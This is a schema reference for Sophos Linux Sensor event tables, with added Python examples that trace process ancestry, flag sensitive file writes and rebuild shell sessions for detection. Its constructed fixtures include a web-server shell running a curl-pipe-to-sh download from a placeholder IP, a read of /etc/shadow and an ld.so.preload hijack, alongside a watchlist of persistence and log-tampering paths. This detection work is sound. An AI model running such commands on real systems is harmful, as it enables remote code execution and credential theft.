
Schema

Table: alerts

Represents alert information.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the Alert was generated.
alert_id utf8 AlertID is the UUID for the alert.
sensor_id utf8 SensorID is the unique identifier for Sophos Linux Sensor (SLS).
priority utf8 Priority is the Alert's priority.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
policy_type utf8 PolicyType is the policy's type.
strategy_name utf8 StrategyName is the name of the strategy which triggered the alert.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.
messages list Messages is the list of messages attached to the alert.

Table: sensor_metadata

Represents a single key/value pair of metadata for a specific sensor.

Name Datatype Description/Attributes
sensor_id utf8 SensorID is the unique identifier for SLS.
key utf8 Key is the metadata key.
value utf8 Value is the metadata value stored under the key.

Table: sensors

Represents sensor information.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the sensor event was generated.
sensor_id utf8 SensorID is the unique identifier for SLS.
sensor_pid int32 SensorPid is the PID of the SLS process.
hostname utf8 Hostname is the hostname of the host on which SLS is running.

Table: lost_records

LostRecord metaevents log instances of potential data loss in SLS.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the lost record was generated.
event_type int32 EventType represents the lost record event type.
action_type int32 ActionType represents the action associated with the lost record event type.
reason utf8 Reason is the reason the lost record event was generated.
lost_count int64 LostCount represents the number of records which were lost.
event_type_name utf8 EventTypeName is the name for the event type that occurred.
action_type_name utf8 ActionTypeName is the name for the action type that occurred.
sensor_id utf8 SensorID is the unique identifier for SLS.

Table: connections

Connections represent all network activity that contains a network address.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the event occurred.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
process_pid int32 ProcessPid is the process pid which created the event.
monotime_nanos int64 MonotimeNanos is the monotonic clock time, in nanoseconds, at which the event occurred.
dst_addr utf8 DstAddr is the destination address for the event.
dst_port int32 DstPort is the destination port for the event.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
success bool Success is whether the connection attempt was successful.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.

Table: process_events

Process Metaevents representing a process action such as exec or fork.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the process event was generated.
event_type int32 EventType represents the process event type.
Fork(0): the process was created by a fork event;
Exec(1): the process was created by an exec event;
Exit(2): the process exited;
Baseline(3): the process event was created during the start of SLS.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
sensor_id utf8 SensorID is the unique identifier for SLS.
pid int32 PID is the process pid.
container_id utf8 ContainerID is the unique identifier for a running container instance.
parent_process_uuid utf8 ParentProcessUUID is a unique ID that represents the unique process of the parent process.
parent_pid int32 ParentPid is the process pid of the parent process.
gid int32 Gid is the group ID associated with the task/thread.
group utf8 GroupName is the group name for the group ID of the task/thread.
uid int32 UID is the user ID associated with the task/thread.
username utf8 Username is the username for the user ID of the task/thread.
euid int32 Euid is the effective user ID for the task/thread.
effective_username utf8 EuidName is the effective username for the user ID of the task/thread.
fsuid int32 FsUID is the filesystem user ID associated with the task/thread.
fs_username utf8 FsUsername is the filesystem username for the FsUID of the task/thread.
fsgid int32 FsGid is the filesystem group ID associated with the task/thread.
fs_group utf8 FsGroupName is the filesystem group name for the FsGID of the task/thread.
login_uid int32 LoginUID is the user ID assigned to the user during login associated with the task/thread.
login_username utf8 LoginUsername is the username for the loginuid of the task/thread.
login_gid int32 LoginGID is the group ID assigned to the user during login associated with the task/thread.
login_group utf8 LoginGroup is the group for the loginuid of the task/thread.
path utf8 Path is the path of the process.
arguments list Arguments are the arguments that were used when creating the process.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
child_pid int32 ChildPID is the PID of the child process created on fork.
child_process_uuid utf8 ChildProcessUUID is a unique ID of a child process created on fork.
egid int32 Egid is the effective group ID for the task/thread.
effective_group utf8 EgidName is the effective group name for the group ID of the task/thread.
tid int32 TID is the thread ID, the task's ID in kernel-land.
return_value int32 ReturnValue is the return value on exec.
event_type_name utf8 EventTypeName is the name for the event type that occurred.
Fork(0): the process was created by a fork event;
Exec(1): the process was created by an exec event;
Exit(2): the process exited;
Baseline(3): the process event was created during the start of SLS.
audit_group_id int32 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.
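
The process_events and connections tables link through process_uuid, and process_events links to itself through parent_process_uuid, so the usual investigation step is to fold the event stream into a per-process index and walk the ancestry of whatever process owned a connection. The following is an added example, not code from this page or from Sophos. The rows are constructed to match the column names documented above (UUIDs, pids, paths and addresses are made up), and the example assumes that a Fork(0) row is recorded against the forking parent in process_uuid with the new process named by child_pid and child_process_uuid, which is how those two columns read. The web-server and shell name lists in the check are illustrative.

```python
"""Reconstruct process ancestry from process_events rows and use it to
explain a connections row. Added example; rows below are constructed."""
from datetime import datetime, timezone

FORK, EXEC, EXIT, BASELINE = 0, 1, 2, 3  # process_events.event_type codes
T0 = 1_700_000_000_000_000_000           # constructed base unix_nano_timestamp

# Constructed process_events rows (only the columns this example uses).
PROCESS_EVENTS = [
    {"unix_nano_timestamp": T0, "event_type": BASELINE, "process_uuid": "p-init",
     "parent_process_uuid": "", "pid": 1, "path": "/sbin/init",
     "arguments": ["/sbin/init"], "uid": 0, "euid": 0, "username": "root"},
    {"unix_nano_timestamp": T0 + 1, "event_type": BASELINE, "process_uuid": "p-nginx",
     "parent_process_uuid": "p-init", "pid": 812, "path": "/usr/sbin/nginx",
     "arguments": ["nginx", "-g", "daemon off;"], "uid": 33, "euid": 33,
     "username": "www-data"},
    # Fork rows are recorded against the forking parent; the new process is
    # named by child_pid / child_process_uuid (assumed reading of the schema).
    {"unix_nano_timestamp": T0 + 2, "event_type": FORK, "process_uuid": "p-nginx",
     "pid": 812, "child_pid": 4021, "child_process_uuid": "p-sh"},
    {"unix_nano_timestamp": T0 + 3, "event_type": EXEC, "process_uuid": "p-sh",
     "parent_process_uuid": "p-nginx", "pid": 4021, "path": "/bin/sh",
     "arguments": ["sh", "-c", "curl -s http://203.0.113.9/x | sh"],
     "uid": 33, "euid": 33, "username": "www-data", "return_value": 0},
    {"unix_nano_timestamp": T0 + 4, "event_type": FORK, "process_uuid": "p-sh",
     "pid": 4021, "child_pid": 4022, "child_process_uuid": "p-curl"},
    {"unix_nano_timestamp": T0 + 5, "event_type": EXEC, "process_uuid": "p-curl",
     "parent_process_uuid": "p-sh", "pid": 4022, "path": "/usr/bin/curl",
     "arguments": ["curl", "-s", "http://203.0.113.9/x"], "uid": 33, "euid": 33,
     "username": "www-data", "return_value": 0},
    {"unix_nano_timestamp": T0 + 9, "event_type": EXIT, "process_uuid": "p-curl",
     "pid": 4022, "return_value": 0},
]

# One constructed connections row made by the curl process above.
CONNECTION = {"unix_nano_timestamp": T0 + 6, "process_uuid": "p-curl",
              "process_pid": 4022, "dst_addr": "203.0.113.9", "dst_port": 80,
              "success": True, "incident_id": ""}

COPIED = ("parent_process_uuid", "pid", "path", "arguments", "uid", "euid", "username")


def build_process_index(events):
    """Fold process_events rows into {process_uuid: latest known state}."""
    index = {}
    for ev in sorted(events, key=lambda e: e["unix_nano_timestamp"]):
        rec = index.setdefault(ev["process_uuid"], {"process_uuid": ev["process_uuid"]})
        if ev["event_type"] == FORK:
            # The child inherits the parent's image and identity until it execs.
            child = index.setdefault(ev["child_process_uuid"],
                                     {"process_uuid": ev["child_process_uuid"]})
            child.update({"parent_process_uuid": ev["process_uuid"], "pid": ev["child_pid"]})
            for k in ("path", "arguments", "uid", "euid", "username"):
                child.setdefault(k, rec.get(k))
            continue
        for k in COPIED:  # Baseline/Exec/Exit rows refresh the process itself
            if k in ev:
                rec[k] = ev[k]
        if ev["event_type"] == EXIT:
            rec["exited"] = True
    return index


def ancestry(index, process_uuid, max_depth=64):
    """Return [process, parent, grandparent, ...] by following parent_process_uuid.
    The seen-set and max_depth guard against cycles or corrupted parent links."""
    chain, seen, uuid = [], set(), process_uuid
    while uuid and uuid in index and uuid not in seen and len(chain) < max_depth:
        seen.add(uuid)
        chain.append(index[uuid])
        uuid = index[uuid].get("parent_process_uuid", "")
    return chain


def ancestry_paths(index, process_uuid):
    return [p.get("path") or "<unknown>" for p in ancestry(index, process_uuid)]


WEB_SERVERS = {"nginx", "httpd", "apache2", "php-fpm"}  # illustrative lists
SHELLS = {"sh", "bash", "dash", "zsh"}


def web_server_spawned_shell(paths):
    """True if a shell sits anywhere below a web server in a child-first chain."""
    names = [p.rsplit("/", 1)[-1] for p in paths]
    return any(n in SHELLS and any(m in WEB_SERVERS for m in names[i + 1:])
               for i, n in enumerate(names))


def explain_connection(conn, index):
    """Attach wall-clock time, owning user and process chain to a connections row."""
    chain = ancestry(index, conn["process_uuid"])
    paths = [p.get("path") or "<unknown>" for p in chain]
    ts = datetime.fromtimestamp(conn["unix_nano_timestamp"] // 1_000_000_000, tz=timezone.utc)
    return {"time": ts.isoformat(), "dst": f'{conn["dst_addr"]}:{conn["dst_port"]}',
            "success": conn["success"], "user": chain[0].get("username") if chain else None,
            "chain": paths, "suspicious": web_server_spawned_shell(paths)}


if __name__ == "__main__":
    print(explain_connection(CONNECTION, build_process_index(PROCESS_EVENTS)))
```

Two details matter when doing this on real data: sort by unix_nano_timestamp before folding, since an Exec row that arrives before its Fork row would otherwise be overwritten with the parent's path, and bound the ancestry walk, because a process whose parent_process_uuid points at a UUID that was never seen (a Baseline gap or a lost record) simply ends the chain rather than raising.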

Table: file_events

FileOperation is a metaevent describing a specific file operation.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the file operation event was generated.
sensor_id utf8 SensorID is the unique identifier for SLS.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
pid int32 PID is the process pid.
container_id utf8 ContainerID is the unique identifier for a running container instance.
path utf8 Path is the path where the file operation occurred.
source_path utf8 SourcePath is the source file path that was linked or moved into the file path.
event_type int32 EventType represents the file event type.
Create(1): the file was created;
Link(2): the file was linked;
Modify(3): the file was modified;
Delete(4): the file was deleted;
Rename(5): the file was renamed;
Symlink(6): the file was symlinked;
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
event_type_name utf8 EventTypeName is the name for the event type that occurred.
Create(1): the file was created;
Link(2): the file was linked;
Modify(3): the file was modified;
Delete(4): the file was deleted;
Rename(5): the file was renamed;
Symlink(6): the file was symlinked;
audit_group_id int32 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.
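
For Link, Rename and Symlink rows the name that matters to a detection is usually path (the name that was linked or moved into), with source_path telling you where the content came from; a rename out of a watched directory, on the other hand, is visible only on the source side. The following is an added example, not code from this page or from Sophos: it normalises constructed file_events rows using the event_type codes documented above and runs a small sensitive-path watchlist over them. The watchlist entries and the rows are the author's constructed illustration, not an SLS policy.

```python
"""Normalise file_events rows into (operation, source, destination) and run a
sensitive-path watchlist over them. Added example; rows are constructed."""
from fnmatch import fnmatchcase

# event_type codes and names from the file_events table.
FILE_EVENT_NAMES = {1: "Create", 2: "Link", 3: "Modify", 4: "Delete", 5: "Rename", 6: "Symlink"}
# Operations for which source_path is meaningful: the name linked or moved into path.
HAS_SOURCE = {"Link", "Rename", "Symlink"}
# Anything that lands a new name or new content at path.
WRITES = {"Create", "Modify", "Rename", "Link", "Symlink"}

# Constructed watchlist: (glob, operations to flag, reason). fnmatch's '*'
# also crosses '/', so "/var/log/*" covers nested directories.
WATCHLIST = [
    ("/etc/cron.d/*", WRITES, "cron persistence"),
    ("/etc/ld.so.preload", WRITES, "ld.so.preload hijack"),
    ("/root/.ssh/authorized_keys", WRITES, "ssh key persistence"),
    ("/home/*/.ssh/authorized_keys", WRITES, "ssh key persistence"),
    ("/var/log/*", {"Delete"}, "log tampering"),
]


def _row(ts, et, path, src="", pid=4100, puuid="p-a"):
    """Constructed file_events row using the documented column names."""
    return {"unix_nano_timestamp": ts, "event_type": et, "path": path, "source_path": src,
            "pid": pid, "process_uuid": puuid, "sensor_id": "sensor-1",
            "container_id": "", "incident_id": ""}


FILE_EVENTS = [
    _row(1, 1, "/tmp/.x"),                                 # Create a staging file
    _row(2, 5, "/etc/cron.d/update", src="/tmp/.x"),       # Rename it into cron.d
    _row(3, 6, "/etc/ld.so.preload", src="/tmp/evil.so"),  # Symlink the preload file
    _row(4, 3, "/home/alice/notes.txt"),                   # benign Modify
    _row(5, 4, "/var/log/auth.log"),                       # Delete a log
    _row(6, 5, "/tmp/w", src="/var/log/wtmp"),             # Rename a log *out* of /var/log
    _row(7, 4, "/tmp/.x"),                                 # benign Delete
]


def normalise(ev):
    """Map a file_events row to op / src / dst using the documented codes."""
    op = FILE_EVENT_NAMES.get(ev["event_type"], f"Unknown({ev['event_type']})")
    src = (ev.get("source_path") or None) if op in HAS_SOURCE else None
    return {"ts": ev["unix_nano_timestamp"], "op": op, "src": src, "dst": ev["path"],
            "pid": ev["pid"], "process_uuid": ev["process_uuid"]}


def check(ev):
    """Return watchlist hits for one row.

    Match on the destination (path) because a Rename/Link/Symlink *into* a
    watched location carries the interesting name in path, not source_path.
    For Delete rules also match a Rename whose source is watched: moving a
    file away removes it just as a Delete would."""
    n = normalise(ev)
    hits = []
    for pattern, ops, reason in WATCHLIST:
        if n["op"] in ops and fnmatchcase(n["dst"], pattern):
            hits.append(f"{reason}: {n['op']} {n['dst']}"
                        + (f" (from {n['src']})" if n["src"] else ""))
        elif n["op"] == "Rename" and "Delete" in ops and n["src"] and fnmatchcase(n["src"], pattern):
            hits.append(f"{reason}: Rename {n['src']} -> {n['dst']} (moved away)")
    return hits


def scan(events):
    """Run the watchlist over rows in timestamp order; returns (ts, message) pairs."""
    return [(ev["unix_nano_timestamp"], h)
            for ev in sorted(events, key=lambda e: e["unix_nano_timestamp"])
            for h in check(ev)]


if __name__ == "__main__":
    for ts, msg in scan(FILE_EVENTS):
        print(ts, msg)
```

The unknown-code branch in normalise is deliberate: if a newer sensor emits an event_type this mapping does not know, the row is still carried through with an "Unknown(n)" operation rather than being dropped, which is the safer failure for a detection pipeline.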

Table: shell_commands

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the unixnano timestamp of the event.
program_filename utf8 ProgramFilename is the file name of the program associated with the event.
program_arguments list ProgramArguments is the program's arguments.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
process_pid int32 ProcessPid is the process pid which created the event.
shell_process_uuid utf8 ShellProcessUUID is a unique ID that represents the unique process of the shell.
shell_process_pid int32 ShellProcessPid is the process pid for the shell that created the event.
exec_event_id utf8 ExecEventID is the ID given to the exec event.
monotime_nanos int64 MonotimeNanos is the monotonic clock time, in nanoseconds, at which the event occurred.
container_id utf8 ContainerID is the unique identifier for a running container instance.
sensor_id utf8 SensorID is the unique identifier for SLS.
uid int32 Uid is the user ID associated with the task/thread.
username utf8 Username is the username for the user ID of the task/thread.
gid int32 Gid is the group ID associated with the task/thread.
group utf8 Group is the group name for the group ID of the task/thread.
euid int32 Euid is the effective user ID for the task/thread.
effective_username utf8 EffectiveUsername is the effective username for the user ID of the task/thread.
egid int32 Egid is the effective group ID for the task/thread.
effective_group utf8 EffectiveGroup is the effective group name for the group ID of the task/thread.
suid int32 Suid is the saved user ID associated with the task/thread.
saved_username utf8 SavedUsername is the saved username for the saved user ID of the task/thread.
sgid int32 Sgid is the saved group ID for the task/thread.
saved_group utf8 SavedGroupname is the saved group name for the saved group ID of the task/thread.
fsuid int32 Fsuid is the filesystem user ID associated with the task/thread.
file_system_username utf8 FileSystemUsername is the filesystem username for the FsUID of the task/thread.
fsgid int32 Fsgid is the filesystem group ID associated with the task/thread.
file_system_group utf8 FileSystemGroup is the filesystem group name for the FsGID of the task/thread.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the event is part of an incident.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.

Table: command_line_events

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the Unix timestamp of when the command line event was generated.
data utf8 Data is the raw data that is contained in the command line event.
monotime_nanos int64 MonotimeNanos is the monotonic clock time, in nanoseconds, at which the command line event occurred.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
process_pid int32 ProcessPid is the process pid which created the event.
cli_process_uuid utf8 CLIProcessUUID is a unique ID that represents the unique process of the cli process.
cli_process_pid int32 CLIProcessPid is the process pid of the cli process.
cli_source utf8 CLISource is where the information about commands is gathered from.
PROCESS: the command information was obtained using the process that was executed from the shell;
READLINE: the command information was obtained using readline;
container_id utf8 ContainerID is the unique identifier for a running container instance.
sensor_id utf8 SensorID is the unique identifier for SLS.
uid int32 Uid is the user ID associated with the task/thread.
username utf8 Username is the username for the user ID of the task/thread.
gid int32 Gid is the group ID associated with the task/thread.
group utf8 Group is the group name for the group ID of the task/thread.
euid int32 Euid is the effective user ID for the task/thread.
effective_username utf8 EffectiveUsername is the effective username for the user ID of the task/thread.
egid int32 Egid is the effective group ID for the task/thread.
effective_group utf8 EffectiveGroup is the effective group name for the group ID of the task/thread.
suid int32 Suid is the saved user ID associated with the task/thread.
saved_username utf8 SavedUsername is the saved username for the saved user ID of the task/thread.
sgid int32 Sgid is the saved group ID for the task/thread.
saved_group utf8 SavedGroupname is the saved group name for the saved group ID of the task/thread.
fsuid int32 Fsuid is the filesystem user ID associated with the task/thread.
file_system_username utf8 FileSystemUsername is the filesystem username for the FsUID of the task/thread.
fsgid int32 Fsgid is the filesystem group ID associated with the task/thread.
file_system_group utf8 FileSystemGroup is the filesystem group name for the FsGID of the task/thread.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the command line event is part of an incident.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.
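
Both shell_commands and command_line_events carry the full identity tuple (uid/euid/suid and their fs variants) per command, which is what lets you see a session cross from a user to root mid-transcript, and cli_process_uuid is the key that groups lines into one shell. The following is an added example, not code from this page or from Sophos: it groups constructed command_line_events rows by shell, orders them by monotime_nanos, renders a transcript and flags commands whose effective identity differs from the real one. The flagging rules are the author's assumptions, not SLS policy; the same code applies to shell_commands rows by substituting shell_process_uuid for cli_process_uuid.

```python
"""Rebuild shell sessions from command_line_events rows and flag commands
whose effective identity differs from the real one. Added example; rows
are constructed."""
from collections import defaultdict

T0 = 1_700_000_000_000_000_000  # constructed base unix_nano_timestamp


def _row(ts, mono, data, source, shell, proc, uid, euid, user, euser, container=""):
    """Constructed command_line_events row using the documented column names."""
    return {"unix_nano_timestamp": T0 + ts, "monotime_nanos": mono, "data": data,
            "cli_source": source, "cli_process_uuid": shell, "cli_process_pid": 5000,
            "process_uuid": proc, "process_pid": 5000, "container_id": container,
            "sensor_id": "sensor-1", "uid": uid, "euid": euid, "suid": euid,
            "username": user, "effective_username": euser, "incident_id": ""}


# Deliberately out of order: monotime_nanos, not list position, orders a session.
COMMAND_LINE_EVENTS = [
    _row(2, 20, "sudo -i", "READLINE", "p-sh1", "p-sh1", 1000, 1000, "alice", "alice"),
    _row(1, 10, "id", "READLINE", "p-sh1", "p-sh1", 1000, 1000, "alice", "alice"),
    _row(3, 30, "/usr/bin/sudo -i", "PROCESS", "p-sh1", "p-sudo", 1000, 0, "alice", "root"),
    _row(4, 40, "cat /etc/shadow", "READLINE", "p-sh2", "p-sh2", 0, 0, "root", "root"),
    _row(5, 50, "ls /", "READLINE", "p-sh3", "p-sh3", 0, 0, "root", "root",
         container="c-abc123"),
]


def sessions(events):
    """Group rows by shell (cli_process_uuid) and order each by monotime_nanos,
    which is immune to wall-clock steps during the session."""
    by_shell = defaultdict(list)
    for ev in events:
        by_shell[ev["cli_process_uuid"]].append(ev)
    return {k: sorted(v, key=lambda e: e["monotime_nanos"]) for k, v in by_shell.items()}


def flags(ev):
    """Identity checks on one row (assumed rules, not SLS policy)."""
    out = []
    if ev["euid"] != ev["uid"]:
        out.append(f"euid {ev['euid']} != uid {ev['uid']} (setuid or sudo)")
    if ev["container_id"] and ev["cli_source"] == "READLINE":
        out.append(f"interactive shell in container {ev['container_id']}")
    return out


def transcript(rows):
    """Render a session as 'user[effective]$ command   # flags'."""
    lines = []
    for ev in rows:
        who = (ev["username"] if ev["euid"] == ev["uid"]
               else f"{ev['username']}[{ev['effective_username']}]")
        prompt = "#" if ev["euid"] == 0 else "$"
        f = flags(ev)
        lines.append(f"{who}{prompt} {ev['data']}" + (f"   # {'; '.join(f)}" if f else ""))
    return lines


def escalated_sessions(sess):
    """Shells in which some command ran with euid 0 under a non-root uid."""
    return sorted(k for k, rows in sess.items()
                  if any(r["euid"] == 0 and r["uid"] != 0 for r in rows))


if __name__ == "__main__":
    for shell, rows in sessions(COMMAND_LINE_EVENTS).items():
        print(f"--- {shell}")
        print("\n".join(transcript(rows)))
```

Note what the transcript does and does not show: the sudo row is attributed to the original shell (cli_process_uuid p-sh1) because that shell launched it, while commands typed into the resulting root shell arrive under a new cli_process_uuid (p-sh2 here) with uid 0. Tying the two together needs the process_events parent chain; the identity columns alone tell you that an escalation happened, not which later shell it produced.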

Table: container_events

Container is a MetaEvent that represents all container lifecycle events (create, start, exit, destroy). It is used in investigations.

Name Datatype Description/Attributes
unix_nano_timestamp int64 UnixNanoTimestamp is the unixnano timestamp for when the container event occurred.
container_id utf8 ContainerID is the unique identifier for a running container instance.
incident_id utf8 IncidentID is the ID of the overall incident. This will be present if the container event is part of an incident.
sensor_id utf8 SensorID is the unique identifier for SLS.
process_uuid utf8 ProcessUUID is a unique ID that represents the unique process.
event_type int32 EventType represents the container event type.
Unknown(0): an unknown container action occurred;
Created(1): a container was created;
Started(2): a container was started;
Exited(3): a container exited;
Destroyed(4): a container was destroyed.
container_name utf8 ContainerName is the name assigned to the container.
image_id utf8 ImageID is the unique image ID that the container was built from.
image_name utf8 ImageName is the name of the image that the container was built from.
pod_name utf8 PodName is the name of the Kubernetes pod if applicable.
namespace utf8 Namespace is the Kubernetes namespace for the pod if applicable.
event_type_name utf8 EventTypeName is the name for the event type that occurred.
Unknown(0): an unknown container action occurred;
Created(1): a container was created;
Started(2): a container was started;
Exited(3): a container exited;
Destroyed(4): a container was destroyed.
audit_group_id utf8 AuditGroupID is the ID of the overall audit group event. This will be present if the event is part of an audit group event.